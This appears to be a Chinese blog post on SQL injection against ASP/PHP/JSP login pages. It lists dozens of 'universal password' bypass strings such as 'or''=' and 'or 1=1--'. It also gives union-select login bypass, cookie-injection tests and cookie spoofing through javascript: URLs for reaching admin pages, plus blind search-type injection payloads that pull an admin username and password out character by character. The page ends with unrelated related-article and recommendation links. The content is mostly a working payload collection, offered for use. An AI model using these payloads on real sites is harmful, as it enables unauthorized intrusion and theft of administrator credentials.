另类登录注入形式:

经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。

猜解思路可以构造,user_name: xxx' and password>'a    如果password第一位大于a,则继续user_name: xxx' and password>'b.

seelct * from admin where username='admin' and password=''注入方法:

万能用户名: xxx' union select * from users/*

select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;

万能密码:

用户名:admin'or''='

密码:'or''='

username:' or 1=1 or ''=' passwd:随便写

'or'='or'

'or''='

'or 1=1

"or"="

'or 1=1/* php

"or "a"="a

"or 1=1--

"or"="

"or"="a'='a

"or1=1--

"or=or"

''or'='or'

') or ('a'='a

'.).or.('.a.'='.a

'or 1=1

'or 1=1--

'or 1=1/*

'or"="a'='a

'or' ''=''

'or''='

'or''=''or''=' !!!!!

'or'=''

'or'='or'

'or.'a.'='a

'or1=1--

'or''='

a'or' =--

a'or'=--

or 'a'='a'

or =--

or1=--

cookie注入:

http://xxxx/view.asp?id=23

先访问http://xxxx/view.asp?id=23

接着在浏览器里输入:

javascript:alert(document.cookie="id="+escape("23 and 1=1"))

再访问http://xxxx/view.asp(未出错)

再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))

再访问:http://xxxx/view.asp(出错)

该页面出错就表示可以用Cookie注入。

cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp

搜索型注入

例如:

判断注入

%' and 1=1 and '%' ='

%' and 1=2 and '%' ='

判断是否存在表

%'and(select count(*)from admin)>0 and '%'='

判断是否存在字段段

%'and(select top 1 len(username)from admin) and '%'='

%'and(select top 1 len(password)from admin) and '%'='

猜字段中的内容范围

%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'='

%'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'='

%'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'='

%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'='

%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'='

%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'='

%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'='

%'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'='

%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'='

%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'='

%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'='

%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'='

%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'='

%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'='

%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'='

%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'='

%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'='

%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'='

%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'='

%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='

数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入的更多相关文章

  1. 注入语句详解(get注入,cookie注入,搜索型注入等)

    注意:对于普通的get注入,如果是字符型,前加'   后加 and ''=' 拆半法 ###################################### and exists (select ...

  2. Sqlserver2008+搜索型注入技术

    简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞.然后搜索%,如果正常返回,说明95%有洞了. 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息 ...

  3. Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]

    在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1 SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可 ...

  4. 实验3 SQL注入原理-万能密码注入

    实验目的 (1)理解[万能密码]的原理 (2)学习[万能密码]的使用 实验原理 一.访问目标网站 1.选择一个存在漏洞的论坛 http://192.168.1.3:8009 进入 2.输入用户名[ad ...

  5. 从c#角度看万能密码SQL注入漏洞

    以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...

  6. pikachu-搜索型注入 #手工注入

    1.搜索型注入漏洞产生的原因: 在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入. 2.搜索型注 ...

  7. 深入浅出带你玩转sqlilabs(三)--GET,POST,COOKIE,万能密码注入

    常见提交方式下的注入漏洞 WEB应用在数据传递接受中,针对SQL注入安全漏洞,由于数据大小,格式等原因,脚本在接受传递时会有多种传递方式,传递方式的不同将影响到安全测试的不同 第一点:数据常见提交方式 ...

  8. sql注入问题 java中将MySQL的数据库验证秘密加上 ' or '1'= '1 就可以出现万能密码

    password的字符串中,加上 ' or '1'= '1 就可以制作出万能密码. 原因如下: 原代码中密码是123456 执行数据库查询语句 实际上执行的SQL语句是: select * from ...

  9. 万能密码的SQL注入漏洞其PHP环境搭建及代码详解+防御手段

    目录 环境搭建 session会话 环境搭建代码 创建数据库脚本 登录界面html: 查询数据库是否为正确的账号密码php代码 连接数据库php代码: 注销登录代码(即关闭session会话) 登录成 ...

随机推荐

  1. window.location 对象

    http://www.home.com:8080/windows/location/page.html?ver=1.0&id=timlq#love 1, window.location.hre ...

  2. hdu5340—Three Palindromes—(Manacher算法)——回文子串

    Three Palindromes Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Others ...

  3. 搭建一个基于CentOS的可视化zookeeper管理工具zkUI实现对zk的可视化管理

    一. zookeeper 可视化工具   JMX => CLRProfile ZKUI => java写的一个可视化的web网站 github中下载 https://github.com/ ...

  4. 转-SourceTree注册atlassian账号SIGUP按钮灰色无法注册的问题

    我们第一次安装sourcetree的时候会要求我们登陆一个账号 但是,会出现注册按钮变灰的怪现象 令人头疼的是,在官网也搞不定. 下面的网址可以顺利注册账号的网址 https://www.atlass ...

  5. python 中为什么不需要重载

    函数重载主要是为了解决两个问题. (1)可变参数类型. (2) 可变参数个数. 另外,一个基本的设计原则是,仅仅当两个函数除了参数类型和参数个数不同以外,其功能是完全相同的,此时才使用函数重载,如果两 ...

  6. DevExpress GridControl+UserControl实现分页

    志向不过是记忆的奴隶,生气勃勃地降生,但却很难成长. —— 莎士比亚 时隔一年,我写随笔真的很随意,想起了就来博客园写写,想不起来就任由懒惰支配着我.不过我到觉得这不是什么坏事,你不用为了完成某事而让 ...

  7. ASP.NET Core学习指导

    ASP.NET Core 学习指导 "工欲善其事必先利其器".我们在做事情之前,总应该做好充分的准备,熟悉自己的工具.就像玩游戏有一些最低配置一样,学习一个新的框架,也需要有一些基 ...

  8. winform app.cpnfig 文件的引用

    1.app.config配置文件修改 <?xml version="1.0" encoding="utf-8"?> <configuratio ...

  9. WCF实现进程间管道通信Demo

    一.代码结构: 二.数据实体类: using System; using System.Collections.Generic; using System.Linq; using System.Run ...

  10. API接口文档范例